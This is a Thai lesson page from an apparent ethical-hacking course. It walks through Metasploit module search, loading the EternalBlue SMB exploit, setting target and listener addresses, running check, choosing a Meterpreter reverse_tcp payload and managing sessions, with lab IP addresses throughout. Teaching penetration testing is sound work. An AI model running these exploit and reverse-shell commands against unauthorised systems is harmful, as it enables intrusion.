การค้นหาและใช้ช่องโหว่
ค้นหาและเรียกใช้
การค้นหาและใช้ช่องโหว่ เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
จากการสำรวจระบบสู่การใช้ประโยชน์จากช่องโหว่
หลังจากสแกนแล้ว คุณจะทราบบริการและรุ่นของระบบเป้าหมาย ขั้นตอนถัดไปคือการค้นหาโมดูล exploit ที่ตรงกับช่องโหว่ที่ทราบในรุ่นเหล่านั้น
คำสั่ง search ของ Metasploit คือประตูสู่โมดูลนับพันรายการ การค้นหาอย่างแม่นยำช่วยประหยัดเวลาและป้องกันการเรียกใช้โค้ดผิดรายการ
การค้นหาพื้นฐาน
คำสั่ง search จะค้นดัชนีโมดูลด้วยคำสำคัญ คุณสามารถค้นหาตามชื่อซอฟต์แวร์, CVE หรือบริการได้
search eternalblue
search type:exploit platform:windows smbตัวกรองการค้นหา
ปรับผลลัพธ์ให้แคบลงด้วยตัวกรอง:
- type: exploit, auxiliary, post
- platform: windows, linux, unix
- cve: ตัวระบุ CVE รายการใดรายการหนึ่ง
- rank: excellent, great, good (ความน่าเชื่อถือ)
การรวมตัวกรองเข้าด้วยกันช่วยลดผลลัพธ์จากโมดูลนับพันให้เหลือเพียงไม่กี่รายการได้อย่างรวดเร็ว
search cve:2017-0144 type:exploitการอ่านผลลัพธ์การค้นหา
ผลการค้นหาจะแสดงโมดูลแต่ละรายการพร้อมระดับ วันที่เปิดเผย และตัวบ่งชี้การตรวจสอบ ระดับจะสะท้อนความน่าเชื่อถือและความปลอดภัยของ exploit
- excellent: มีโอกาสน้อยที่จะทำให้เป้าหมายหยุดทำงาน
- great/good: เชื่อถือได้ภายใต้เงื่อนไขทั่วไป
- low/manual: มีความเสี่ยงหรือต้องตั้งค่าอย่างระมัดระวัง
ควรเลือกโมดูลที่มีระดับสูงกว่า เพื่อหลีกเลี่ยงการทำให้ระบบที่ใช้งานจริงหยุดทำงาน
การโหลดโมดูล
ใช้หมายเลขดัชนีของโมดูลหรือเส้นทางแบบเต็มร่วมกับ use พรอมต์จะเปลี่ยนไปแสดงโมดูลที่โหลดแล้ว และคลังข้อมูลจะเก็บตัวเลือกของโมดูลนั้นไว้
use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >การตรวจสอบโมดูล
ก่อนเรียกใช้งาน โปรดอ่านข้อมูลเกี่ยวกับโมดูลก่อน info จะแสดงคำอธิบาย แหล่งอ้างอิง (CVE และคำแนะนำด้านความปลอดภัย) ตัวเลือกที่จำเป็น และเป้าหมายที่รองรับ
การเข้าใจว่าโมดูลทำงานอย่างไรเป็นส่วนหนึ่งของการใช้งานอย่างมืออาชีพและมีความรับผิดชอบ โปรดอย่าเรียกใช้ช่องโหว่ที่คุณไม่เข้าใจโดยเด็ดขาด
info
show options
show targetsการตั้งค่าตัวเลือก
กำหนดค่าตัวเลือกที่จำเป็นด้วย set ตัวเลือกที่ใช้บ่อยสำหรับช่องโหว่โจมตีจากระยะไกล ได้แก่ ที่อยู่เป้าหมายและการตั้งค่าเพย์โหลดของคุณ
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2คำสั่ง check
ช่องโหว่โจมตีจำนวนมากรองรับ check ซึ่งจะทดสอบอย่างปลอดภัยว่าเป้าหมายดูเหมือนมีช่องโหว่หรือไม่ โดยไม่ ใช้ช่องโหว่โจมตีจริง
การเรียกใช้ check ก่อนเป็นแนวทางปฏิบัติที่ดี เพราะช่วยลดความเสี่ยงที่ระบบจะหยุดทำงาน และยืนยันว่าคุณกำลังจะทุ่มเทความพยายามให้กับโอกาสที่มีอยู่จริง
check
# [+] 10.10.10.40:445 - The target is vulnerable.การเลือกเพย์โหลด
ช่องโหว่โจมตีจำเป็นต้องมีเพย์โหลด Metasploit จะเลือกค่าเริ่มต้นให้ แต่คุณสามารถแสดงรายการและเลือกเพย์โหลดที่เหมาะกับเป้าหมายและระดับการเข้าถึงที่ต้องการได้
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcpการเรียกใช้และเซสชัน
เริ่มการทำงานด้วย exploit (หรือ run) หากสำเร็จ คุณจะได้รับ เซสชัน ซึ่งเป็นการเชื่อมต่อแบบโต้ตอบกับเป้าหมาย
จัดการเซสชันหลายรายการด้วย sessions -l เพื่อแสดงรายการ และ sessions -i N เพื่อโต้ตอบกับเซสชันนั้น ใช้ background เพื่อพักเซสชันไว้เบื้องหลังและทำงานต่อในคอนโซล
exploit
sessions -l
sessions -i 1ตัวเลือกส่วนกลางเทียบกับตัวเลือกของโมดูล
การตั้งค่าบางอย่าง เช่น LHOST จะนำกลับมาใช้ซ้ำในหลายโมดูลได้ ให้ตั้งค่าแบบส่วนกลางด้วย setg เพื่อไม่ต้องพิมพ์ซ้ำทุกครั้งที่เปลี่ยนโมดูล
set: ใช้กับโมดูลปัจจุบันเท่านั้นsetg: ใช้กับทุกโมดูลแบบส่วนกลางunsetg: ล้างค่าส่วนกลาง
วิธีนี้ช่วยประหยัดเวลาเมื่อทำงานระยะยาวที่มีหลายโมดูล
setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40ตรวจสอบอย่างรวดเร็ว
เลือกขั้นตอนที่มีความรับผิดชอบก่อนเรียกใช้ช่องโหว่โจมตี
สรุปทบทวน
คุณได้เรียนรู้วิธีค้นหาและเรียกใช้ช่องโหว่โจมตีแล้ว:
- ใช้ search พร้อมตัวกรอง (ประเภท แพลตฟอร์ม cve ระดับ) เพื่อค้นหาโมดูล
- เลือกโมดูลที่มี rank สูงกว่าเพื่อความน่าเชื่อถือและความปลอดภัย
- ใช้ use เพื่อโหลด ใช้ info/show options เพื่อตรวจสอบ และใช้ set เพื่อกำหนดค่า
- เรียกใช้ check ก่อน จากนั้นใช้ exploit เพื่อสร้าง เซสชัน
- จัดการเซสชันด้วย sessions -l/-i
ถัดไป: เพย์โหลดและเชลล์หลังการโจมตี Meterpreter
คำถามที่พบบ่อย
บทเรียน “การค้นหาและใช้ช่องโหว่” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “การค้นหาและใช้ช่องโหว่” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “การค้นหาและใช้ช่องโหว่”
ค้นหาและเรียกใช้ คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน
บทเรียน “การค้นหาและใช้ช่องโหว่” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม
ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- สถาปัตยกรรม Metasploit
- การค้นหาและใช้ช่องโหว่
- เพย์โหลดและ Meterpreter
- มอดูลหลังการโจมตี